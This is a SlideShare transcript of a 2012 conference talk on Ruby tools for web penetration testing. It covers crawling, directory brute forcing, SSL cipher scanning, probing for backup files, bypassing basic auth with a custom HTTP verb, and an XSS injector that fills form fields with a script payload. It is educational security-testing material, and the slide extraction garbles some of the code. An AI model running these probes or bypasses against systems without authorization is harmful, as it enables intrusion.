Picking gem ruby for penetration testers

1,927 views
1,806 views

Published on

Published in: Technology, Design
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,927
On SlideShare
0
From Embeds
0
Number of Embeds
22
Actions
Shares
0
Downloads
30
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide
  • \n
  • \n
  • Why choosing ruby? Mainly because for its great networking API supporting HTTP natively and having a powerful regular expression engine (>= 1.9). Yeah, it is cool too.\n\n
  • DISCLAIMER\n
  • Change your mindset\n
  • A small recap on application security. Focus will be on discovery, information gathering, ssl, xss and sql injections\n
  • Leverage your attack surface... what to look for?\n
  • robots.txt\n
  • robots.txt\n
  • links -r http://www.corriere.it\n
  • Crawling a website\n
  • ruby crawl.rb -1 http://localhost:8080/\n
  • Browsing with a transparent proxy\n
  • casper code highlight\n
  • ruby -I lib bin/casper "" 8008\n
  • bruteforcing using enchant\n
  • ruby -I lib bin/enchant localhost:8080 \n
  • wapf... fingerprint using MD5 applied to static file common to frameworks\n
  • ciphersurfer and SSL Testing\n
  • ciphersurfer highlight\n
  • ruby -I lib bin/ciphersurfer www.facebook.com\n
  • The important to check for backup files\n
  • ruby crawl.rb -2 http://localhost:8080/\n
  • Bypassing auth for old written PHP app protected with basic auth and with poor configuration\n
  • What XSS is\n
  • cross code highlight\n
  • again cross highlight\n
  • ruby -I lib bin/cross "http://localhost:8080/examples/xss_me.jsp"\n
  • what we learnt\n
  • links\n
  • \n
  • \n
  • Picking gem ruby for penetration testers

    1. 1. picks and gems: ruby for penetration @thesp0nge
    2. 2. self.inspecthttps://github.com/thesp0nge@thesp0ngehttp://armoredcode.com
    3. 3. Why ruby?• API • networking • string manipulation• Net::HTTP• Coolness 3
    4. 4. DisclaimerAttack only sites you’re authorized to 4
    5. 5. What to test?class Developer class Developer # a bunch of great include # methods here Person::Attackerend # a plenty of great # methods here endChange your mindset.You’re an attackernow! 5
    6. 6. What to test? Your app is a black box You mustclass Developer gather informations include about it Person::Attacker # a plenty of great You don’t have # methods here credentialsend Ooh look... a web form... RubyDay IT, Milan, 15 June 6 2012
    7. 7. Leverage your attack surface“It’s my web application. I don’t even promote it. I have all theinformations about it, what are you talking about?”Deep knowledge ofthe underlyingtechnologySpot attackentrypointsCheck transportlayer securityCheck for theservice door RubyDay IT, Milan, 15 June 7 2012
    8. 8. Leverage your attack surfacerobots.t to discoverxt to fingerprint RubyDay IT, Milan, 15 June 8 2012
    9. 9. Leverage your attack surface $ gem install links $ links -r http://www.yourtarget.com # TESTING: SPIDERS, ROBOTS, AND CRAWLERS (OWASP-IG-001) def self.robots(site, only_disallow=true) if (! site.start_with? http://) and (! site.start_with? https://) site = http://+site end list = [] begin res=Net::HTTP.get_response(URI(site+/robots.txt)) if (res.code != "200") return [] end“Just a bunch of ruby loc res.body.split("n").each do |line|away...” if only_disallow if (line.downcase.start_with?(disallow)) list << line.split(":")[1].strip.chomp end else if (line.downcase.start_with?(allow) or line.downcase.start_with?(disallow)) list << line.split(":")[1].strip.chomp end end end rescue return [] end list end RubyDay IT, Milan, 15 June 9 2012
    10. 10. Demo 10
    11. 11. • Search engines crawl your site they are polite, you can ask not to do it• Attackers crawl your site... they are not polite. $ gem install anemone require anemone Anemone.crawl("http://www.target.com/") do |anemone| anemone.on_every_page do |page| puts page.url end end 11 event name
    12. 12. Demo 12
    13. 13. Build a transparentSometimes you need to observe the requestsyour browser makes while using a website...async calls are so sweets...$ gem install casper Useful to check$ casper javascripts or urls called on going... while manual browsing your target site RubyDay IT, Milan, 15 June 13 2012
    14. 14. Build a transparent module Casper class Proxy < WEBrick::HTTPProxyServer attr_reader :req_count attr_reader :hosts Extending def initialize(config={}) @req_count = 0 @hosts=[] WEBRick config[:Port] ||= 8080 config[:AccessLog] = [] config[:ProxyContentHandler] = Proc.new do |req, res| log_requests(req, res) end super(config) endprivate def log_requests(req, res) $stdout.puts "[#{Time.now}] #{req.request_line.chomp}n" if @hosts.index(req.host).nil? @hosts << req.host end Make the business inc_req_count end def inc_req_count @req_count += 1 end RubyDay IT, Milan, 15 June 14 2012
    15. 15. Demo 15
    16. 16. enchant: brute force discoveryVery intrusive attack...discover web directoriesusing brute force. You’ll bebusted $ gem install enchant $ enchant http://www.yourtarget.com RubyDay IT, Milan, 15 June 16 2012
    17. 17. Demo 17
    18. 18. Web Application fingerpringWeb servers answer to thesame HTTP request indifferent way. GET / HTTP/1.0HTTP/1.1 200 OKDate: Sun, 15 Jun 2003 17:10: 49 GMT HTTP/1.1 200 OKServer: Apache/1.3.23 Server: Microsoft-IIS/5.0Last-Modified: Thu, 27 Feb 2003 03:48: 19 GMT Content-Location: http://iis.example.com/Default.htmETag: 32417-c4-3e5d8a83 Date: Fri, 01 Jan 1999 20:13: 52 GMTAccept-Ranges: bytes Content-Type: text/HTMLContent-Length: 196 Accept-Ranges: bytesConnection: close Last-Modified: Fri, 01 Jan 1999 20:13: 52 GMTContent-Type: text/HTML ETag: W/e0d362a4c335be1: ae1 Content-Length: 133 http://code.google.com/p/ webapplicationfingerprinter/ RubyDay IT, Milan, 15 June 18 2012
    19. 19. SSL Testing Evaluate an SSL connection for:• protocols the server supports• cipher length• certificate key length$ gem install ciphersurfer$ ciphersurfer www.gmail.comEvaluating secure communication with www.gmail.com:443 Overall evaluation : B (76.5) Protocol support : ooooooooooooooooooooooooooooooooooooooooooooooooooooooo (55) Key exchange : oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo (80) Cipher strength : oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo (90) RubyDay IT, Milan, 15 June 19 2012
    20. 20. SSL Testingprotocol_version.each do |version| s =Ciphersurfer::Scanner.new({:host=>host,:port=>port, :proto=>version}) s.go if (s.ok_ciphers.size != 0) supported_protocols << version cipher_bits = cipher_bits | s.ok_bits def go ciphers = ciphers | s.ok_ciphers context=OpenSSL::SSL::SSLContext.new(@proto) end cipher_set = context.ciphers cipher_set.each do |cipher_name, cipher_version, bits, algorithm_bits|end request = Net::HTTP.new(@host, @port) request.use_ssl = true request.verify_mode = OpenSSL::SSL::VERIFY_NONE request.ciphers= cipher_name begin response = request.get("/") @ok_bits << bits @ok_ciphers << cipher_name rescue OpenSSL::SSL::SSLError => e # Quietly discard SSLErrors, really I dont care if the cipher has # not been accepted rescue # Quietly discard all other errors... you must perform all error # chekcs in the calling program end end end RubyDay IT, Milan, 15 June 20 2012
    21. 21. Demo 21
    22. 22. Check for backup Crawl the web site and append file extension to your GETsrequire anemonerequire httpclienth=HTTPClient.new()Anemone.crawl(ARGV[0]) do |anemone| anemone.on_every_page do |page| response = h.get(page.url) puts "Original: #{page.url}: #{response.code}" response = h.get(page.url.to_s.split(";")[0].concat(".bak")) puts "BAK: #{page.url.to_s.split(";")[0].concat(".bak")}: #{response.code}" response = h.get(page.url.to_s.split(";")[0].concat(".old")) puts "OLD: #{page.url.to_s.split(";")[0].concat(".old")}: #{response.code}" response = h.get(page.url.to_s.split(";")[0].concat("~")) puts "~: #{page.url.to_s.split(";")[0].concat("~")}: #{response.code}" endend RubyDay IT, Milan, 15 June 22 2012
    23. 23. Demo 23
    24. 24. BypassA case study for a PHP 5.3 application usingbasic auth: with a tampered HTTP verb you canaccess to protected urls require net/http Create a custom HTTP class Dammi < Net::HTTPRequest METHOD="DAMMI" verb REQUEST_HAS_BODY = false RESPONSE_HAS_BODY = true end http=Net::HTTP.new(www.mytarget.nonexistent, 80) r_a = http.request(Dammi.new("/backend/index.php")) Make the request puts r_a.body RubyDay IT, Milan, 15 June 24 2012
    25. 25. Cross site scriptingExecuting arbitrary javascript code at clientsite by submitting a crafted parameter on aweb form RubyDay IT, Milan, 15 June 25 2012
    26. 26. Cross site scripting$ gem install cross$ cross http://www.yourtarget.com module Cross # Engine is the cross class using Mechanize to inject canary and check for # output class Engine include Singleton attr_reader :agent # Starts the engine def start @agent = Mechanize.new {|a| a.log = Logger.new("cross.log")} @agent.user_agent_alias = Mac Safari end def inject(url) found = false page = @agent.get(url) page.forms.each do |f| f.fields.each do |ff| ff.value = "<script>alert(cross canary);</script>" end pp = @agent.submit(f) scripts = pp.search("//script") scripts.each do |sc| if sc.children.text == "alert(cross canary);" found = true end end end found end end end RubyDay IT, Milan, 15 June 26 2012
    27. 27. Cross site scripting#!/usr/bin/env ruby$LOAD_PATH.unshift(File.expand_path(File.dirname(__FILE__) + /../lib))require mechanizerequire aprequire loggerrequire crosshost = Cross::Host.new(ARGV[0])ap "cross " + Cross::Version.version[:string] + " (C) 2011 - thesp0nge"ap "target: " + host.hostengine = Cross::Engine.instanceengine.startif engine.inject(ARGV[0]) ap "Canary found in output page. Suspected XSS"end It doesn’t work with iframe apps :-( RubyDay IT, Milan, 15 June 27 2012
    28. 28. Demo 28
    29. 29. What we learnt• Don’t trust your users• “Security through obscurity” is EVIL• Testing for security issues is a mandatory step before deploy• HTTPS won’t safe from XSS or SQL Injections 29
    30. 30. Some links before we http://armoredcode.com/blog/categories/pentest- with-ruby/https://gist.github.com/2935464 for anemone crawling demo) (gist https://github.com/thesp0nge/links https://github.com/thesp0nge/ ciphersurfer https://github.com/thesp0nge/enchant https://github.com/thesp0nge/cross http://www.owasp.org http://ronin-ruby.github.com/ https://github.com/rapid7/metasploit-framework RubyDay IT, Milan, 15 June 30 2012
    31. 31. Questions? 31 event name
    32. 32. Thank you! 32 event name

    ×